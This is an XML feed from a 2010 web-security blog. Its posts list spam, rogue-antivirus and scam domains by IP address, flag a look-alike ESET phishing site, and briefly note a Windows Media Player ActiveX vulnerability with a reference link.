<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" gd:etag="W/&quot;C0cDSXo6eCp7ImA9WxBUGUo.&quot;"><id>tag:blogger.com,1999:blog-2992238913899645252</id><updated>2010-03-07T06:11:18.410-08:00</updated><title>Web Security Weblog</title><subtitle type="html" /><link rel="http://schemas.google.com/g/2005#feed" type="application/atom+xml" href="http://www.web2secure.com/feeds/posts/default" /><link rel="alternate" type="text/html" href="http://www.web2secure.com/" /><link rel="next" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default?start-index=26&amp;max-results=25&amp;redirect=false&amp;v=2" /><author><name>secur065web</name><uri>http://www.blogger.com/profile/03927955797207814790</uri><email>noreply@blogger.com</email></author><generator version="7.00" uri="http://www.blogger.com">Blogger</generator><openSearch:totalResults>333</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/atom+xml" href="http://feeds.feedburner.com/WebSecurityWeblog" /><feedburner:info uri="websecurityweblog" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><entry gd:etag="W/&quot;C0cDSXo4fSp7ImA9WxBUGUo.&quot;"><id>tag:blogger.com,1999:blog-2992238913899645252.post-4462101365115296023</id><published>2010-03-07T06:09:00.000-08:00</published><updated>2010-03-07T06:11:18.435-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-07T06:11:18.435-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="spam" /><title>Spam ** 07-March-10</title><content type="html">Spams that flooded in my daily Inbox.&lt;br /&gt;&lt;br /&gt;www.localactiondating.com&lt;br /&gt;www.grefills7.com&lt;br /&gt;www.vorkelni.com&lt;br /&gt;www.znaijdexo.com&lt;br /&gt;fukin4fun.net&lt;br /&gt;mkl.placepillsjob.com?zk&lt;br /&gt;canadapharmacyonline.com.cn&lt;br /&gt;www.aredirect.ru&lt;br /&gt;www.onudkulti.com&lt;br /&gt;www.jaypeyvve.com&lt;br /&gt;ijs.rxonline24.com?ojq&lt;br /&gt;www.solvetruck.com&lt;br /&gt;www.solvewhite.com&lt;br /&gt;www.viagrow-sale.com&lt;br /&gt;www.brefills2.com&lt;br /&gt;www.rxrefill-07.com&lt;br /&gt;f161891.duckminute.ru&lt;br /&gt;7d316.liquidwhile.ru&lt;br /&gt;7c0e3a8fb357.solvefizz.ru&lt;br /&gt;b2d7665eddd120c.trainfound.ru&lt;br /&gt;b3e0917d8c.cellhard.ru&lt;br /&gt;fccd4baffbbdb8.sayeager.ru&lt;br /&gt;76015329d314.hugeraise.ru&lt;br /&gt;f885a61073.cleanmodest.ru&lt;br /&gt;c73aabf2.handboat.ru&lt;br /&gt;c72bb1111e6.socell.ru&lt;br /&gt;tre.emv3.comHS?&lt;br /&gt;9f9a9f.paintride.ru&lt;br /&gt;290aa344cb8379d.ledeast.ru&lt;br /&gt;d16f1687705fb.inventhow.ru&lt;br /&gt;e10ada.dresstable.ru&lt;br /&gt;8e134c4b4ecc467.gardenspoke.ru&lt;br /&gt;50ede4c6b70e2.storysay.ru&lt;br /&gt;d193c300ea906b0.quzixenov.cn&lt;br /&gt;07c83.peakrenown.ru&lt;br /&gt;7a5cfd32dc274e.theremove.ru&lt;br /&gt;389b5ee9feaaa17.landfire.ru&lt;br /&gt;58418dc23f3bd.sincesolve.ru&lt;br /&gt;8e3e64f2dd981.railpose.ru&lt;br /&gt;2b08130d0c.hascity.ru&lt;br /&gt;fyad.org10hre&lt;br /&gt;b7644f.tinyroot.ru&lt;br /&gt;f9edc657fb9d.endthink.ru&lt;br /&gt;04f16fc1a0bf72e.heartbits.ru&lt;br /&gt;df7bdb6.choosetingle.ru&lt;br /&gt;e66f62d2e4cdf.yibohidum.cn&lt;br /&gt;8ddaa8.puporodat.cn&lt;br /&gt;c72da9ecd0.zoriduwaq.cn&lt;br /&gt;www.jackpotspree.net&lt;br /&gt;a07a339acf88c.bibigemos.cn&lt;br /&gt;352caff98.desertgreat.ru&lt;br /&gt;29f174354f53f.relaxfinest.ru&lt;br /&gt;c76b4a2c918a.cornseed.ru&lt;br /&gt;88712.ohbeauty.ru&lt;br /&gt;gkh.fafuseqiq.cn&lt;br /&gt;5d67c3b9acaff3.wifelook.ru&lt;br /&gt;02505.waitwhose.ru&lt;br /&gt;c268c.samerange.ru&lt;br /&gt;1da38cba1322d.chairrange.ru&lt;br /&gt;0b3aa64.prizeprove.ru&lt;br /&gt;073401fda70d.shoeswell.ru&lt;br /&gt;b8b68b4a30.actalive.ru&lt;br /&gt;75b6a75f.guidepure.ru&lt;br /&gt;8188164f89.richcell.ru&lt;br /&gt;0ad50d1812.groupplane.ru&lt;br /&gt;831b1944241.flowguide.ru&lt;br /&gt;9bf3dd25eb7.cuddlymeek.ru&lt;br /&gt;be9791dd3f68.southsuperb.ru&lt;br /&gt;b491cdba4edb066.valleyfound.ru&lt;br /&gt;8f448f3e7bd.poundanswer.ru&lt;br /&gt;23c21095ce49cd.hearspread.ru&lt;br /&gt;8109fbda833303.famousdoor.ru&lt;br /&gt;330cf5d214bd3.poemfoot.ru&lt;br /&gt;164ac.chordwait.ru&lt;br /&gt;c0af17.chordlate.ru&lt;br /&gt;dc581406.yulestreet.ru&lt;br /&gt;85b439de60c49.cottonorgan.ru&lt;br /&gt;75130dcf.sensecolor.ru&lt;br /&gt;3508ae.quietlevel.ru&lt;br /&gt;846a88.kecejazos.cn&lt;br /&gt;hrz.ultimatepharmdrive.com&lt;br /&gt;f58a6fc2e472.wuzagutok.cn&lt;br /&gt;8ea660659942a6.demuqoxim.cn&lt;br /&gt;9a7d028caf52.teachwall.ru&lt;br /&gt;6087781d9e5e.thelate.ru&lt;br /&gt;18a335065bae4.threeglad.ru&lt;br /&gt;ireporters.keyringl.net&lt;br /&gt;e55eab.majornew.ru&lt;br /&gt;61cfe24faf79a4b.squaretingle.ru&lt;br /&gt;764db.thingtiny.ru&lt;br /&gt;b72987832.loftygather.ru&lt;br /&gt;3d8784b608f26f.causewell.ru&lt;br /&gt;5636e549f53.thingstood.ru&lt;br /&gt;76d67.thanmeet.ru&lt;br /&gt;b58b85c978d7aa.politecotton.ru&lt;br /&gt;free-bizzz.comindex.php&lt;br /&gt;22696541099b9b7.studybeat.ru&lt;br /&gt;3c813edb0.coursestood.ru&lt;br /&gt;a62c76edfcddc06.classeach.ru&lt;br /&gt;529e965c9d43a.dimplemuch.ru&lt;br /&gt;16cb7cc.lookfriend.ru&lt;br /&gt;51c0f1c10a85.creasesexy.ru&lt;br /&gt;97142.supplyperson.ru&lt;br /&gt;ac844465ee7.jewelband.ru&lt;br /&gt;7169d.lakereach.ru&lt;br /&gt;61e85d2.helpparent.ru&lt;br /&gt;ad5c53c9453731a.pullfinish.ru&lt;br /&gt;9d02fc69b734f88.smoothjoin.ru&lt;br /&gt;c8786521f53f178.meantdrink.ru&lt;br /&gt;4d129fc1997.gigglespruce.ru&lt;br /&gt;c1f3d8ce084df1.didschool.ru&lt;br /&gt;2cb911c30.deluxequart.ru&lt;br /&gt;6fb7aa6dc3385d.settlesudden.ru&lt;br /&gt;8ce06af668e3bb.loftyflower.ru&lt;br /&gt;b2b8fec4529ef.aglowdecide.ru&lt;br /&gt;b3013932.behindby.ru&lt;br /&gt;5b753b.oilraise.ru&lt;br /&gt;fc571ee6cda5.mayfeed.ru&lt;br /&gt;f767b848319.rosewill.ru&lt;br /&gt;91a6a820850c891.rangetoward.ru&lt;br /&gt;638c9a120.salttop.ru&lt;br /&gt;15d2b3d41020d17.breakrenown.ru&lt;br /&gt;eed6644ecd.renownverb.ru&lt;br /&gt;cf36912.boardmove.ru&lt;br /&gt;235811.wintermonth.ru&lt;br /&gt;e5f7322d89.nowgentle.ru&lt;br /&gt;d7f5ce46a7.fizzable.ru&lt;br /&gt;163dfc11a91.factpalate.ru&lt;br /&gt;9e030191b.multimakey.ru&lt;br /&gt;4626bb00fec37.marketrace.ru&lt;br /&gt;cb9060e65.inventbroad.ru&lt;br /&gt;4fbff46f6547.piecedrop.ru&lt;br /&gt;aae19734f.rubgolden.ru&lt;br /&gt;760000ef9c4d.exoticswell.ru&lt;br /&gt;b23588b9dd4dd43.lucidtrain.ru&lt;br /&gt;ca35dd3efce.pearlput.ru&lt;br /&gt;dab256de9d11.caretop.ru&lt;br /&gt;27459fded1668.ropespace.ru&lt;br /&gt;2f4057da.backson.ru&lt;br /&gt;85464d2.designwow.ru&lt;br /&gt;a9fc169.werise.ru&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-4462101365115296023?l=www.web2secure.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/oBnPMYvWcHRwBgNS_Wr_dhLtddQ/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/oBnPMYvWcHRwBgNS_Wr_dhLtddQ/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/oBnPMYvWcHRwBgNS_Wr_dhLtddQ/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/oBnPMYvWcHRwBgNS_Wr_dhLtddQ/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.web2secure.com/feeds/4462101365115296023/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=2992238913899645252&amp;postID=4462101365115296023" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/4462101365115296023?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/4462101365115296023?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/WebSecurityWeblog/~3/sa3Tp_CNMd0/spam-07-march-10.html" title="Spam ** 07-March-10" /><author><name>secur065web</name><uri>http://www.blogger.com/profile/03927955797207814790</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="05729779973789084377" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.web2secure.com/2010/03/spam-07-march-10.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkIAQH08eip7ImA9WxBXEUs.&quot;"><id>tag:blogger.com,1999:blog-2992238913899645252.post-2668883386750155786</id><published>2010-01-22T05:49:00.000-08:00</published><updated>2010-01-22T05:55:41.372-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-01-22T05:55:41.372-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="rogue" /><category scheme="http://www.blogger.com/atom/ns#" term="spam" /><title>Rogue Antivirus and Spams- 22-Jan</title><content type="html">IP: 62.90.136.210&lt;br /&gt;&lt;br /&gt;becomesantyvirus.net&lt;br /&gt;bestalltools.com&lt;br /&gt;bestfoodtest.com&lt;br /&gt;goodantyviruspillnow.com&lt;br /&gt;homeboxsecurity.com&lt;br /&gt;inspectallrealty.com&lt;br /&gt;luckvirustoolbox.com&lt;br /&gt;mail.bentestsite.com&lt;br /&gt;mail.bestalltools.com&lt;br /&gt;mail.bestfoodtest.com&lt;br /&gt;mail.excavatevirustool.net&lt;br /&gt;mail.goodantyviruspillnow.com&lt;br /&gt;mail.inspectallrealty.com&lt;br /&gt;mail.luckvirustoolbox.com&lt;br /&gt;mail.maybeantispyware.net&lt;br /&gt;mail.mynewvirusbex.com&lt;br /&gt;mail.onlineantispywareremo.com&lt;br /&gt;mail.paycyberbill.com&lt;br /&gt;mail.scanlifetimeonline.com&lt;br /&gt;mail.scantechindia.com&lt;br /&gt;mail.securytybnasty.com&lt;br /&gt;mail.thecheckcredit.com&lt;br /&gt;mail.thetoolsbargain.com&lt;br /&gt;mail.yourantivirusscan.com&lt;br /&gt;maybeantispyware.net&lt;br /&gt;mynewvirusbex.com&lt;br /&gt;ns1.bentestsite.com&lt;br /&gt;ns1.bestfoodtest.com&lt;br /&gt;ns1.cuttingutilities.com&lt;br /&gt;ns1.homeboxsecurity.com&lt;br /&gt;ns1.inspectallrealty.com&lt;br /&gt;ns1.mynewvirusbex.com&lt;br /&gt;ns1.scantechindia.com&lt;br /&gt;onlineantispywareremo.com&lt;br /&gt;paycyberbill.com&lt;br /&gt;scanlifetimeonline.com&lt;br /&gt;startingantivirus.net&lt;br /&gt;scantechindia.com&lt;br /&gt;thecheckcredit.com&lt;br /&gt;thetoolsbargain.com&lt;br /&gt;www.bestalltools.com&lt;br /&gt;www.cuttingutilities.com&lt;br /&gt;www.gameonlinesite.com&lt;br /&gt;www.nowhomesecurity.com&lt;br /&gt;www.thetoolsbargain.com&lt;br /&gt;www.websecurityswitch.com&lt;br /&gt;yourantivirusscan.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;IP: 62.90.136.211&lt;br /&gt;&lt;br /&gt;ns2.bentestsite.com&lt;br /&gt;ns2.bestfoodtest.com&lt;br /&gt;ns2.cuttingutilities.com&lt;br /&gt;ns2.homeboxsecurity.com&lt;br /&gt;ns2.inspectallrealty.com&lt;br /&gt;ns2.mynewvirusbex.com&lt;br /&gt;ns2.scantechindia.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;IP: 62.90.136.207&lt;br /&gt;&lt;br /&gt;dating0marriage.net&lt;br /&gt;destinycombine.net&lt;br /&gt;healthe-lovesite.com&lt;br /&gt;ifound-thelove.net&lt;br /&gt;join-destinies.net&lt;br /&gt;lonely-heart-waiting.com&lt;br /&gt;love-formeandyou.com&lt;br /&gt;love-greatthing.com&lt;br /&gt;love-isaclick.com&lt;br /&gt;love-me-cares.net&lt;br /&gt;love-onlylove.com&lt;br /&gt;loveand-only.com&lt;br /&gt;loveiskiss.com&lt;br /&gt;mail.and-i-loveyoutoo.com&lt;br /&gt;mail.dating0marriage.net&lt;br /&gt;mail.destinycombine.net&lt;br /&gt;mail.healthe-lovesite.com&lt;br /&gt;mail.heartconections.net&lt;br /&gt;mail.ifound-thelove.net&lt;br /&gt;mail.join-destinies.net&lt;br /&gt;mail.lonely-heart-waiting.com&lt;br /&gt;mail.love-formeandyou.com&lt;br /&gt;mail.love-galaxys.com&lt;br /&gt;mail.love-greatthing.com&lt;br /&gt;mail.love-isaclick.com&lt;br /&gt;mail.love-isexcellent.net&lt;br /&gt;mail.love-me-cares.net&lt;br /&gt;mail.love-onlylove.com&lt;br /&gt;mail.love-youloves.com&lt;br /&gt;mail.loveand-only.com&lt;br /&gt;mail.loveishunt.com&lt;br /&gt;mail.meet-the-lovedestiny.com&lt;br /&gt;mail.world-1meetlove.com&lt;br /&gt;mail.yourdestinyhere.net&lt;br /&gt;mail.yourmatchwith.net&lt;br /&gt;meet-the-lovedestiny.com&lt;br /&gt;ns1.createyourlove.net&lt;br /&gt;ns1.loveattaches.net&lt;br /&gt;ns2.one-serv.net&lt;br /&gt;only-loveall.com&lt;br /&gt;www.and-i-loveyoutoo.com&lt;br /&gt;www.best-only-love.com&lt;br /&gt;www.crystalic-love.com&lt;br /&gt;www.destinycombine.net&lt;br /&gt;www.destinycontacts.net&lt;br /&gt;www.feel-freewithlove.com&lt;br /&gt;www.flirt-withmedirect.com&lt;br /&gt;www.found-thelove.com&lt;br /&gt;www.healthe-lovesite.com&lt;br /&gt;www.heartconections.net&lt;br /&gt;www.ifound-thelove.net&lt;br /&gt;www.join-destinies.net&lt;br /&gt;www.lonely-heart-waiting.com&lt;br /&gt;www.love-formeandyou.com&lt;br /&gt;www.love-is-special.com&lt;br /&gt;www.love-isaclick.com&lt;br /&gt;www.love-me-cares.net&lt;br /&gt;www.love-youloves.com&lt;br /&gt;www.loveishunt.com&lt;br /&gt;www.matchwithworld.net&lt;br /&gt;www.meet-nowlove.com&lt;br /&gt;www.meet-the-lovedestiny.com&lt;br /&gt;www.myheart-hwithlove.com&lt;br /&gt;www.only-loveall.com&lt;br /&gt;www.romance-hunting.com&lt;br /&gt;www.tenderwoman.net&lt;br /&gt;www.world-1meetlove.com&lt;br /&gt;www.yourdestinyhere.net&lt;br /&gt;www.yourmatchwith.net&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-2668883386750155786?l=www.web2secure.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/bWvtlIHtwuLycK93P29DK02KhXQ/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/bWvtlIHtwuLycK93P29DK02KhXQ/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/bWvtlIHtwuLycK93P29DK02KhXQ/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/bWvtlIHtwuLycK93P29DK02KhXQ/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.web2secure.com/feeds/2668883386750155786/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=2992238913899645252&amp;postID=2668883386750155786" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/2668883386750155786?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/2668883386750155786?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/WebSecurityWeblog/~3/OXeX4S2aC-8/rogue-antivirus-and-spams-22-jan.html" title="Rogue Antivirus and Spams- 22-Jan" /><author><name>secur065web</name><uri>http://www.blogger.com/profile/03927955797207814790</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="05729779973789084377" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.web2secure.com/2010/01/rogue-antivirus-and-spams-22-jan.html</feedburner:origLink></entry><entry gd:etag="W/&quot;Dk8DQXk9fip7ImA9WxBXEE0.&quot;"><id>tag:blogger.com,1999:blog-2992238913899645252.post-7870193678935035967</id><published>2010-01-20T08:19:00.000-08:00</published><updated>2010-01-20T08:27:50.766-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-01-20T08:27:50.766-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="phishing" /><title>ESET Phishing website?</title><content type="html">ESET is one of the famous antivirus security vendor in the security field. If users accidentally browse to www.eset32.net instead of www.eset.com. Then you better careful on what you browse.&lt;br /&gt;&lt;br /&gt;www.eset32.net (78.108.84.16)&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_N2xP0b-ECBo/S1cuXj8wvyI/AAAAAAAAA7A/bqobrB9fOZY/s1600-h/eset-net.PNG"&gt;&lt;img style="cursor: pointer; width: 272px; height: 320px;" src="http://4.bp.blogspot.com/_N2xP0b-ECBo/S1cuXj8wvyI/AAAAAAAAA7A/bqobrB9fOZY/s320/eset-net.PNG" alt="" id="BLOGGER_PHOTO_ID_5428858858140385058" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;www.eset.com&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_N2xP0b-ECBo/S1cuYDRQ6LI/AAAAAAAAA7I/Jn-qB-LMWLI/s1600-h/eset-com.PNG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 310px;" src="http://2.bp.blogspot.com/_N2xP0b-ECBo/S1cuYDRQ6LI/AAAAAAAAA7I/Jn-qB-LMWLI/s320/eset-com.PNG" alt="" id="BLOGGER_PHOTO_ID_5428858866547878066" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-7870193678935035967?l=www.web2secure.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/JnfaJ1y7Tjp_UQKxgzN1C7z6ZOA/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/JnfaJ1y7Tjp_UQKxgzN1C7z6ZOA/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/JnfaJ1y7Tjp_UQKxgzN1C7z6ZOA/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/JnfaJ1y7Tjp_UQKxgzN1C7z6ZOA/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.web2secure.com/feeds/7870193678935035967/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=2992238913899645252&amp;postID=7870193678935035967" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/7870193678935035967?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/7870193678935035967?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/WebSecurityWeblog/~3/q6an5L9J1Yo/eset-phishing-website.html" title="ESET Phishing website?" /><author><name>secur065web</name><uri>http://www.blogger.com/profile/03927955797207814790</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="05729779973789084377" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_N2xP0b-ECBo/S1cuXj8wvyI/AAAAAAAAA7A/bqobrB9fOZY/s72-c/eset-net.PNG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.web2secure.com/2010/01/eset-phishing-website.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEQNR3g-fSp7ImA9WxBQGUw.&quot;"><id>tag:blogger.com,1999:blog-2992238913899645252.post-2016812540202226798</id><published>2010-01-19T07:51:00.000-08:00</published><updated>2010-01-19T07:53:16.655-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-01-19T07:53:16.655-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="rogue" /><category scheme="http://www.blogger.com/atom/ns#" term="antivirus" /><title>antivirus360.ru Rogue AV</title><content type="html">Rogue Antivirus&lt;br /&gt;&lt;br /&gt;IP address: 69.31.84.26&lt;br /&gt;&lt;br /&gt;*.antivirus360.ru&lt;br /&gt;*.nalunu.net&lt;br /&gt;*.oemmarketplace.com&lt;br /&gt;*.windows-security-update.com&lt;br /&gt;antivirus360.ru&lt;br /&gt;greenh.info&lt;br /&gt;hostmaster.antivirus360.ru&lt;br /&gt;hostmaster.nalunu.net&lt;br /&gt;hostmaster.oemmarketplace.com&lt;br /&gt;mail.antivirus360.ru&lt;br /&gt;mail.nalunu.net&lt;br /&gt;mail.oemmarketplace.com&lt;br /&gt;mail.windows-security-update.com&lt;br /&gt;ns1.windows-security-update.com&lt;br /&gt;ns2.antivirus360.ru&lt;br /&gt;ns2.nalunu.net&lt;br /&gt;ns2.oemmarketplace.com&lt;br /&gt;ns2.windows-security-update.com&lt;br /&gt;oemmarketplace.com&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-2016812540202226798?l=www.web2secure.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/oTxtz-Zv3ihWtr8dFNaGQ-iP3iQ/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/oTxtz-Zv3ihWtr8dFNaGQ-iP3iQ/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/oTxtz-Zv3ihWtr8dFNaGQ-iP3iQ/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/oTxtz-Zv3ihWtr8dFNaGQ-iP3iQ/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.web2secure.com/feeds/2016812540202226798/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=2992238913899645252&amp;postID=2016812540202226798" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/2016812540202226798?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/2016812540202226798?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/WebSecurityWeblog/~3/OtSpc4UXoXw/antivirus360ru-rogue-av.html" title="antivirus360.ru Rogue AV" /><author><name>secur065web</name><uri>http://www.blogger.com/profile/03927955797207814790</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="05729779973789084377" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.web2secure.com/2010/01/antivirus360ru-rogue-av.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUMCSXw_fCp7ImA9WxBQGE8.&quot;"><id>tag:blogger.com,1999:blog-2992238913899645252.post-5945398942384480068</id><published>2010-01-18T07:08:00.000-08:00</published><updated>2010-01-18T07:11:08.244-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-01-18T07:11:08.244-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="Media Player" /><category scheme="http://www.blogger.com/atom/ns#" term="ActiveX" /><title>Vulnerability in Windows Media Player ActiveX launchURL()</title><content type="html">&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_N2xP0b-ECBo/S1R51_w7MxI/AAAAAAAAA64/wUp1V4sAvRQ/s1600-h/MediaPlayer.PNG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 146px;" src="http://1.bp.blogspot.com/_N2xP0b-ECBo/S1R51_w7MxI/AAAAAAAAA64/wUp1V4sAvRQ/s320/MediaPlayer.PNG" alt="" id="BLOGGER_PHOTO_ID_5428097419444957970" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Reference:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;http://sebug.net/exploit/18957/&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-5945398942384480068?l=www.web2secure.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/zIkcg_K-4Du9iisneARwnc3dEu4/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/zIkcg_K-4Du9iisneARwnc3dEu4/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/zIkcg_K-4Du9iisneARwnc3dEu4/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/zIkcg_K-4Du9iisneARwnc3dEu4/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.web2secure.com/feeds/5945398942384480068/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=2992238913899645252&amp;postID=5945398942384480068" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/5945398942384480068?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/2992238913899645252/posts/default/5945398942384480068?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/WebSecurityWeblog/~3/M9AOJOkzdZU/vulnerability-in-windows-media-player.html" title="Vulnerability in Windows Media Player ActiveX launchURL()" /><author><name>secur065web</name><uri>http://www.blogger.com/profile/03927955797207814790</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="05729779973789084377" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_N2xP0b-ECBo/S1R51_w7MxI/AAAAAAAAA64/wUp1V4sAvRQ/s72-c/MediaPlayer.PNG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.web2secure.com/2010/01/vulnerability-in-windows-media-player.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D0UDSHk9fSp7ImA9WxBQGE8.&quot;"><id>tag:blogger.com,1999:blog-2992238913899645252.post-5834702500954119071</id><published>2010-01-18T06:30:00.000-08:00</published><updated>2010-01-18T06:34:39.765-08:00</updated><app:edited 